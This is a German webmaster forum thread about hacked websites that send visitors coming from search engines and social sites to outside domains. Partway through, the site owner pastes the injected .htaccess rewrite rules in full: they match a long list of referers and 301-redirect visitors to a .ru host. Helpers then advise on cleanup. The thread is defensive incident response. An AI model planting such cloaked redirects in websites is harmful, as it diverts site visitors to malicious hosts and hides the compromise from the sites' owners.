webseiten nicht mehr über google aufrufbar

[Geri345]

hab ein großes problem,

ein großteil der webseiten die ich betreue (liegen alle auf dem selben webspace) ist nicht mehr auf google ereichbar.
sie werden zwar ganz normal gefunden (1. seite), aber sobald ich auf den weiterführenden link klicke komme ich zurück auf die startseite von google.

hab mal von einer seite alle dateien überprüft und konnte keinen schadcode entdecken, auch die webmaster-tools von google fanden nichts.

was kann das problem sein?

bin am verzweifeln :(

 

[Trüffelkrieger]

Wie wäre es mit einem Link, damit man sich das mal anschauen kann?

 

[Geri345]

versuchs mal mit bigfoot-design.at GmbH :: Werbung mit Hand und Fuss

bei eingabe in der adresszeile müsstest du normal auf die seite kommen und bei der weiterleitung von der google-suche wird der obige fehler eintreten

edit: hab noch einen gratis online-dienst probiert um die seiten zu scanne. der sagt auch, dass sie clean sein müssten

 

[Sentence]

Moin,
die Links die Google mir zu deiner Seite ausspuckt funktionieren bei mir Problemlos.

MfG

 

[Geri345]

ok dann hast du glück oO

hab aus mehreren unabhängigen quellen bestätigt bekommen, dass das nicht funktioniert (hier bei 6 pcs getestet und mehrere beschwerden per mail oder tel)

edit:

laut sitecheck.sucuri.net ist im root-verzeichnis (wo die index.php liegt) eine 404javascript.js datei...kann die aber am server nicht finden. gibts im filezilla eine möglichkeit um versteckte dateien azuzeigen? oO

edit2: anzeigen versteckter datein bringt auch nichts -.-

 

[Trüffelkrieger]

Habe das gleiche Problem wie du, allerdings wurde beim ersten Versuch nicht auf die Google Startseite umgeleitet, sondern auf eine URL dieser Domain: http://finalnamejobsnow.info

Versteckte Dateien: Anleitung - Versteckte Dateien anzeigen - FileZilla-Client.de

 

[Geri345]

das aktivieren der versteckten dateien bringt anscheinend auch nichts :(

ich weis jetzt ungefähr was es ist (ein redirect-hack/virus), wo es ist (anscheinend eine 404javascript.js) jedoch unauffindbar das teil

hab auf einer webseite bereits den ganzen quelltext durch, alle bilder nochmal mit alten ersetzt und sämtlichen cache gelöscht. kein ergebnis bis jetzt -.-

edit: hier nochmal der bericht von http://sitecheck.sucuri.net/results/www.bigfoot-design.at

edit2:

hab was gefunden!!!
in der htaccess-datei ist folgender code-müll enthalten

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://azurearray.ru/accessible?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://azurearray.ru/accessible?8 [R=301,L]
</IfModule>

was darf ich löschen?

 

[Sentence]

Alles davon,
dieses Konstrukt in der htaccess versucht nur, sich vor Suchmaschinen und co zu verstecken.
Was du ändern musst sind definitiv FTP Zugangsdaten und Zugangsdaten zu evtl. vorhandenen Backends.
Dann deine Scripte mal auf Sicherheit checken und ggf. updaten und dort schauen, ob sich noch irgendwo verdächtiger Code aufhält.

MfG

 

[Geri345]

zugangsdaten sind bereits geändert.

hab schon alles gecheckt (eine komplette webseite) und bis auf die .htaccess nichts verdächtiges gefunden :(
gibts da keine tools die mir den webspace checken?

edit: ich lasse jetzt den file-zilla alle dateien suchen, die seit beginn des monats geändert wurden, bringt das was?

 

[Trüffelkrieger]

Hast du das mit der .htaccess Datei bereinigt und geht's jetzt wieder?

 

[Geri345]

vorher hab ich die .htaccess nur geleert und überspeichert. hat nichts gebracht bzw die htaccess blieb unverändert (mit den hack-einträgen).

hab sie jetzt gelöscht und jetzt gehts wieder
natürlich alle passwörter geändert und vorher nochmal nen virenscanner übern pc laufen lassen

 

[Geri345]

zu früh gefreut, die .htaccess erstellt sich von selbst neu oO

 

[Sentence]

Irgendeines deiner Scripte wird die .htaccess dann erstellen.
Hast du keine Logfiles in denen du verdächtige Zugriffe finden kannst?

FileZilla ist nicht grad die beste wahl, wenn man die ftp Passwörter mit abspeichert, das geschieht nämlich im klartext und wird so auch gerne ausgenutzt.

 

[Geri345]

nein keine ahnung wo die sind, hab aber bei meinem hoster angefragt ob ich die kriege

dann müsste ich eig nur auf die uhrzeit schauen und dann sehe ich, welches script eine neue htaccess geschrieben hat?

 

[Sentence]

Das hängt von den Logfiles ab.
In der Regel bekommst du bei einem Hoster wahrscheinlich nur access logs, das heißt logfiles der Browserzugriffe. Dort kannst du aber sehen von welcher IP auf welche Datei mit welchen Parametern zugegriffen wurde. Denke das wird schon helfen.
Dann gibts noch ftp logs, da kannst du die FTP Zugriffe sehen wie up und downloads.
Mehr wirst du wahrscheinlich nicht bekommen.
Ein guter Hoster wird dir aber helfen den Fehler zu finden, geht ja schließlich auch um die Sicherheit ihrer Systeme.

Wenn die htaccess immer neu erstellt wird, vielleicht hilft es temporär eine leere eigene htaccess anzulegen und diese mit schreibschutz zu versehen.

Bist du mit der Seite bei den Google Webmastertools registriert? Dort gibts auch tipps wenn der google crawler was verdächtiges findet.

 

[Geri345]

die logs hab ich mir gezogen, hab jetzt einige js-dateien modifiziert, die mehrmals in den letzten stunden "aufgerufen" wurden (da war tatsächlicher seltsamer code drinnen)

das mit der leeren htaccess auf read-only probier ich gleich

 

[Geri345]

gibts da nicht irgendwelche "scanner" die den ganzen ftp durchsuchen können? jeden quelltext auf schadcode zu überprüfen würde selbst mit einem ganzen team tage dauern, die ich nicht habe. da sind über 100 webseiten auf dem ftp -.-

und alle 15min die virus-htaccess löschen ist auch keine dauerlösung (nur auf lese-berechtigung funktioniert leider auch nicht :( )

 

[threadi]

Es gibt Tools mit denen man Webseiten auf Virenbefall prüfen kann, aber das wird dir hier wenig bringen.

Du solltest als allererstes alles was auf dem Server liegt löschen. Ja, alles. Und dann deine lokale Sicherung der Daten wieder hoch laden. Dann kannst Du dir, zusammen mit der Änderung jeglicher Zugangsdaten (FTP, Verwaltung, Adminbereiche etc.), relativ sicher sein, dass Du den Schädling los bist.

Solltest Du keine lokale Sicherung der Daten haben, wird es für dich wirklich aufwendig. Dann würde ich dir empfehlen die Dateien alle lokal runterzuladen und lokal nach den Schädlingen zu durchsuchen. Das die htaccess regelmäßig neu geschrieben wird, spricht für ein Script, welches entweder von extern regelmäßig aufgerufen wird oder einen Cronjob der regelmäßig läuft. Ersteres kannst Du in den access-Logs deines Webspaces herausfinden. Letzteres durch Kontrolle der aktuell installierten Cronjobs.
Die lokal kopierten Dateien kannst Du außerdem nach Stichwörtern durchsuchen. Da die htaccess-Dateu neu geschrieben wird, könnte man annehmen, dass irgendwo das Wort htaccess vorkommt. ;)

Btw. noch ein Tipp: als ich mal bei einem Webspace so einen Befall bemerkte, lagen im cgi-bin-Verzeichnis einige Dateien die dort nicht hingehörten. Das wird offenbar gerne genommen, da nicht jeder Webspace-Nutzer dieses Verzeichnis beachtet (weil es so "systemisch" klingt ;) ) und man dort prima Perl- oder andere Programmiersprachen ausführen kann.

In jedem Fall sollte dein erster Ansprechpartner bei bestehenden Problemen eigentlich dein Webhoster sein. Der hat volle Kontrolle und vollen Einblick in alles was auf dem Server passiert und sollte dir auch aus Eigeninteresse helfen.

 

[Geri345]

auf dem root finde ich keinen cgi-bin ordner und der webhoster kann mir irgendwie auch nicht weiterhelfen, da die anscheinend auch nicht mehr möglichkeiten als ich haben -.-

naja bin jetzt seit 2-3 stunden htaccess-frei nachdem ich ein paar codeschnippsel aus 5 .js datein gelöscht habe, so lange wars noch nie :)

 

[threadi]

.js-Dateien führen aber keinen serverseitigen Code aus. Da musst Du schon genauer schauen denke ich.

Und wenn der Webhoster nicht helfen kann, solltest du ihn wechseln. So ein Verhalten ist in diesem Fall absolut unprofessionell.